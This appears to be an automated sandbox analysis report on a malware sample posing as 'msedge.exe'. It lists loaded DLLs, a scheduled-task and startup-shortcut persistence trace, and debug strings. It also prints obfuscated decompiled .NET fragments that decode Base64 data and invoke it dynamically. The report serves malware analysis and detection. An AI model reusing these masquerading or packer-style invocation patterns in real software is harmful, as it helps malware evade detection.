Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: msedge.lnk.0.dr

LNK file: ..\..\..\..\..\..\Local\msedge.exe

Source: msedge.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: msedge.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb@w^ source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: .pdb. source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdbHm source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb` source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\msedge.PDB7 source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: indoC:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdbx source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdbhG source: WER1A3A.tmp.dmp.14.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
